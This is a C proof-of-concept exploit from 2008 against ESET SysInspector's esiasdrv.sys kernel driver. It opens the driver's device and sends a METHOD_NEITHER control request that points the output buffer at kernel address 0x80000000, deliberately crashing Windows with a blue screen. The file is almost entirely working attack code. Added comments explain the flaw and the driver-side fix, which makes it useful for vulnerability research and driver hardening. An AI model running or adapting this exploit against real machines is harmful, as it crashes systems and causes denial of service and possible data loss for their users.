ESET SysInspector - 1.1.1.0 (esiasdrv.sys) Proof of Concept Exploit
来源:http://www.ntinternals.org/ 作者:alex 发布时间:2008-10-03  
////////////////////////////////////////////////////////////////////////////////////
// +----------------------------------------------------------------------------+ //
// |                                                                            | //
// | ESET, LLC. - http://www.eset.com/                                          | //
// |                                                                            | //
// | Affected Software:                                                         | //
// | ESET System Analyzer Tool - 1.1.1.0                                        | //
// |                                                                            | //
// | Affected Driver:                                                           | //
// | Eset SysInspector AntiStealth driver - 3.0.65535.0 - esiasdrv.sys          | //
// | Proof of Concept Exploit                                                   | //
// |                                                                            | //
// +----------------------------------------------------------------------------+ //
// |                                                                            | //
// | NT Internals - http://www.ntinternals.org/                                 | //
// | alex ntinternals org                                                       | //
// | 01 October 2008                                                            | //
// |                                                                            | //
// +----------------------------------------------------------------------------+ //
////////////////////////////////////////////////////////////////////////////////////

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

// Declaration helpers for the ntdll exports used below: the functions are
// imported (presumably from ntdll.lib) with the NT native __stdcall convention.
#define IMP_VOID __declspec(dllimport) VOID __stdcall
#define IMP_SYSCALL __declspec(dllimport) NTSTATUS __stdcall

// OBJECT_ATTRIBUTES.Attributes flag: object-manager name lookup ignores case.
#define OBJ_CASE_INSENSITIVE 0x00000040
// NtCreateFile CreateDisposition: open the object if it exists, create otherwise.
#define FILE_OPEN_IF 0x00000003

// Control code decoded per the CTL_CODE layout: device type 0x0022
// (FILE_DEVICE_UNKNOWN), function 0xF07, access bits 0 (FILE_ANY_ACCESS),
// transfer method bits 0x3 = METHOD_NEITHER.  With METHOD_NEITHER the I/O
// manager copies and validates nothing; the driver receives the caller's raw
// input/output pointers and must probe them itself.  (Name keeps the original
// misspelling of "neither".)
#define IOCTL_METHOD_NEIGHTER 0x00223C1F
// Size in bytes passed for both the input and the output buffer.
#define BUFFER_LENGTH 0x04

// Local stand-in for the NT status type.  NOTE(review): the real NTSTATUS is a
// signed LONG; the unsigned typedef only matters for the sign of printed values
// and for comparisons, not for the "non-zero means failure" checks used here.
typedef ULONG NTSTATUS;

// Counted UTF-16 string as used by the NT native API.  Length and
// MaximumLength are byte counts; Buffer is not required to be NUL-terminated.
// The offset comments assume a 32-bit build (4-byte PWSTR, 8-byte struct).
typedef struct _UNICODE_STRING
{
    /* 0x00 */ USHORT Length;         // bytes in use, excluding any terminator
    /* 0x02 */ USHORT MaximumLength;  // bytes available in Buffer
    /* 0x04 */ PWSTR Buffer;          // not owned by this struct
    /* 0x08 */
}
    UNICODE_STRING,
  *PUNICODE_STRING,
**PPUNICODE_STRING;

// Describes the object to open for NtCreateFile: name, optional root
// directory handle, lookup flags and optional security settings.  Length must
// be sizeof(OBJECT_ATTRIBUTES).  Offsets in the comments are for a 32-bit
// build (4-byte handles and pointers, 0x18 bytes total).
typedef struct _OBJECT_ATTRIBUTES
{
    /* 0x00 */ ULONG Length;
    /* 0x04 */ HANDLE RootDirectory;                               // NULL/0: ObjectName is a full path
    /* 0x08 */ PUNICODE_STRING ObjectName;
    /* 0x0C */ ULONG Attributes;                                   // OBJ_* flags
    /* 0x10 */ PSECURITY_DESCRIPTOR SecurityDescriptor;            // unused here (NULL)
    /* 0x14 */ PSECURITY_QUALITY_OF_SERVICE SecurityQualityOfService; // unused here (NULL)
    /* 0x18 */
}
    OBJECT_ATTRIBUTES,
  *POBJECT_ATTRIBUTES,
**PPOBJECT_ATTRIBUTES;

// Completion record filled in by the I/O calls below: final status of the
// request plus a request-specific Information value (byte count for
// device-control requests).  The unnamed union is an MSVC extension /
// C11 anonymous member.  Offsets are for a 32-bit build (0x08 bytes).
typedef struct _IO_STATUS_BLOCK
{
    union
    {
        /* 0x00 */ NTSTATUS Status;
        /* 0x00 */ PVOID Pointer;
    };

    /* 0x04 */ ULONG Information;
    /* 0x08 */
}
    IO_STATUS_BLOCK,
  *PIO_STATUS_BLOCK,
**PPIO_STATUS_BLOCK;

// Completion-routine signature accepted by NtDeviceIoControlFile.  Declared
// only so the prototype below type-checks; this program always passes NULL.
// (IN/OUT/OPTIONAL are empty annotation macros from windows.h.)
typedef VOID (NTAPI *PIO_APC_ROUTINE)
(
    IN PVOID ApcContext,
    IN PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG Reserved
);

// Points DestinationString at the NUL-terminated SourceString without
// copying: Length is set to the byte length excluding the terminator and
// MaximumLength to Length plus one WCHAR.  SourceString must outlive the
// UNICODE_STRING (here it is a string literal, so that holds).
IMP_VOID RtlInitUnicodeString
(
    IN OUT PUNICODE_STRING DestinationString,
    IN PCWSTR SourceString
);

// Native open/create of a file or device object described by
// ObjectAttributes.  On success writes the new handle to *FileHandle and the
// completion details to *IoStatusBlock; returns 0 (STATUS_SUCCESS) or a
// non-zero NTSTATUS.  Whether an unprivileged caller can open the device at
// all is decided by the device object's security descriptor, which is not
// visible from this listing.
IMP_SYSCALL NtCreateFile
(
    OUT PHANDLE FileHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PLARGE_INTEGER AllocationSize OPTIONAL,
    IN ULONG FileAttributes,
    IN ULONG ShareAccess,
    IN ULONG CreateDisposition,
    IN ULONG CreateOptions,
    IN PVOID EaBuffer OPTIONAL,
    IN ULONG EaLength
);

// Sends IoControlCode to the driver behind FileHandle.  Returns 0 on success
// or a non-zero NTSTATUS; *IoStatusBlock receives the final status and byte
// count.  For METHOD_NEITHER control codes InputBuffer/OutputBuffer are
// delivered to the driver as the caller's unchecked pointers, so the driver
// alone is responsible for probing them (ProbeForRead/ProbeForWrite under
// __try) before dereferencing.
IMP_SYSCALL NtDeviceIoControlFile
(
    IN HANDLE FileHandle,
    IN HANDLE Event OPTIONAL,
    IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
    IN PVOID ApcContext OPTIONAL,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN ULONG IoControlCode,
    IN PVOID InputBuffer OPTIONAL,
    IN ULONG InputBufferLength,
    OUT PVOID OutputBuffer OPTIONAL,
    IN ULONG OutputBufferLength
);

// Native sleep.  Interval is in 100-nanosecond units; a negative value is a
// delay relative to now, a positive value an absolute time.  Alertable=FALSE
// means user APCs do not interrupt the wait.  Return value is ignored here.
IMP_SYSCALL NtDelayExecution
(
    IN BOOLEAN Alertable,
    IN PLARGE_INTEGER Interval
);

// Closes a handle obtained from the native API; returns 0 on success.
IMP_SYSCALL NtClose
(
    IN HANDLE Handle
);

int __cdecl main(int argc, char **argv)
{
    /*
     * Entry point of the proof of concept.  Sequence: clear the console and
     * print the banner, open \Device\esiasdrv by name, wait four seconds
     * with a visible countdown, then send one METHOD_NEITHER IOCTL whose
     * OutputBuffer pointer is not a user-mode address.  argc/argv are unused.
     *
     * Returns FALSE (0) when every call succeeds, otherwise the non-zero
     * NTSTATUS of the failing NtDeviceIoControlFile / NtClose call (the
     * status is also printed).  Per the header the successful IOCTL is
     * expected to crash the machine, so the normal return is rarely reached.
     */
    NTSTATUS NtStatus;
   
    HANDLE DeviceHandle;        // written by NtCreateFile; see NOTE(review) below
    ULONG InputBuffer;          // 4-byte value handed to the driver by pointer

    UNICODE_STRING DeviceName;
    OBJECT_ATTRIBUTES ObjectAttributes;
    IO_STATUS_BLOCK IoStatusBlock;
    LARGE_INTEGER Interval;     // relative delay for NtDelayExecution
   
    ///////////////////////////////////////////////////////////////////////////////////////////////
   
    // Cosmetic only: spawns the command interpreter to clear the screen.
    // NOTE(review): system() is generally avoided; harmless here but unnecessary.
    system("cls");
   
    printf( " +----------------------------------------------------------------------------+\n"
            " |                                                                            |\n"
            " | ESET, LLC. - http://www.eset.com/                                          |\n"
            " |                                                                            |\n"
            " | Affected Software:                                                         |\n"
            " | ESET System Analyzer Tool - 1.1.1.0                                        |\n"
            " |                                                                            |\n"
            " | Affected Driver:                                                           |\n"
            " | Eset SysInspector AntiStealth driver - 3.0.65535.0 - esiasdrv.sys          |\n"
            " | Proof of Concept Exploit                                                   |\n"
            " |                                                                            |\n"
            " +----------------------------------------------------------------------------+\n"
            " |                                                                            |\n"
            " | NT Internals - http://www.ntinternals.org/                                 |\n"
            " | alex ntinternals org                                                       |\n"
            " | 01 October 2008                                                            |\n"
            " |                                                                            |\n"
            " +----------------------------------------------------------------------------+\n\n");
   
    ///////////////////////////////////////////////////////////////////////////////////////////////
   
    // NT object-manager path of the driver's device object.  DeviceName only
    // references the literal; no copy is made.
    RtlInitUnicodeString(&DeviceName, L"\\Device\\esiasdrv");

    // Filled field by field.  RootDirectory = 0 is a null handle (NULL would
    // be the clearer spelling); with no root the name is an absolute path.
    // No security descriptor / QoS is supplied.
    ObjectAttributes.Length = sizeof(OBJECT_ATTRIBUTES);
    ObjectAttributes.RootDirectory = 0;
    ObjectAttributes.ObjectName = &DeviceName;
    ObjectAttributes.Attributes = OBJ_CASE_INSENSITIVE;
    ObjectAttributes.SecurityDescriptor = NULL;
    ObjectAttributes.SecurityQualityOfService = NULL;

  
    // Open the device for read/write with full sharing; FILE_OPEN_IF is the
    // disposition, no create options or extended attributes.
    NtStatus = NtCreateFile(
                            &DeviceHandle,                      // FileHandle
                            FILE_READ_DATA | FILE_WRITE_DATA,   // DesiredAccess
                            &ObjectAttributes,                  // ObjectAttributes
                            &IoStatusBlock,                     // IoStatusBlock
                            NULL,                               // AllocationSize OPTIONAL
                            0,                                  // FileAttributes
                            FILE_SHARE_READ | FILE_SHARE_WRITE, // ShareAccess
                            FILE_OPEN_IF,                       // CreateDisposition
                            0,                                  // CreateOptions
                            NULL,                               // EaBuffer OPTIONAL
                            0);                                 // EaLength

    /*
    if(NtStatus)
    {
        printf(" [*] NtStatus of NtCreateFile - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }
    */
    // NOTE(review): with the status check above commented out, a failed
    // NtCreateFile (driver not loaded, open denied by the device ACL, ...)
    // leaves DeviceHandle indeterminate, and that indeterminate value is still
    // passed to NtDeviceIoControlFile below — undefined behavior.  Restoring
    // the check the author already wrote avoids it.
   
    // 64-bit value 0xFFFFFFFFFF676980 = -10,000,000 in 100-ns units, i.e. a
    // relative delay of one second (negative means relative to now).
    Interval.LowPart = 0xFF676980;
    Interval.HighPart = 0xFFFFFFFF;

    // Four one-second waits with a countdown so the console can be read
    // before the machine goes down.  NOTE(review): stdout is not flushed
    // between the prints; if it is buffered for this process the countdown
    // may not be visible before the crash.
    printf("\n 3");
    NtDelayExecution(FALSE, &Interval);
   
    printf(" 2");
    NtDelayExecution(FALSE, &Interval);

    printf(" 1");
    NtDelayExecution(FALSE, &Interval);

    printf(" Upss\n\n");
    NtDelayExecution(FALSE, &Interval);


    //
    // Choose type of BSoD
    //
    // The control code is METHOD_NEITHER, so the driver's handler receives
    // InputBuffer and OutputBuffer exactly as supplied.  OutputBuffer
    // 0x80000000 is the first address of the kernel half of a 32-bit address
    // space with the default 2 GB split; a handler that writes its result
    // through that pointer without ProbeForWrite()/__try validation faults
    // in kernel mode, which is presumably the crash the header describes.
    // The InputBuffer value appears to select what the handler does (the
    // author's alternative is kept below); its meaning is not visible from
    // user mode.  The driver-side fix is to probe both buffers under
    // __try/__except (or switch the code to a buffered method) and to
    // restrict the device object's ACL so only intended callers reach it.

    // InputBuffer = 0x12345678;
   
    InputBuffer = 0;


    NtStatus = NtDeviceIoControlFile(
                                    DeviceHandle,          // FileHandle
                                    NULL,                  // Event
                                    NULL,                  // ApcRoutine
                                    NULL,                  // ApcContext
                                    &IoStatusBlock,        // IoStatusBlock
                                    IOCTL_METHOD_NEIGHTER, // IoControlCode
                                    &InputBuffer,          // InputBuffer
                                    BUFFER_LENGTH,         // InputBufferLength
                                    (PVOID)0x80000000,     // OutputBuffer
                                    BUFFER_LENGTH);        // OutputBufferLength
   
    // Only reached if the driver rejected the request (e.g. it does probe
    // the pointers): report the status and exit with it.
    if(NtStatus)
    {
        printf(" [*] NtStatus of NtDeviceIoControlFile - 0x%.8X\n", NtStatus);
        return NtStatus;
    }
   
    NtStatus = NtClose(DeviceHandle); // Handle
   
    if(NtStatus)
    {
        printf(" [*] NtStatus of NtClose - 0x%.8X\n", NtStatus);   
        return NtStatus;
    }

    return FALSE;
}

 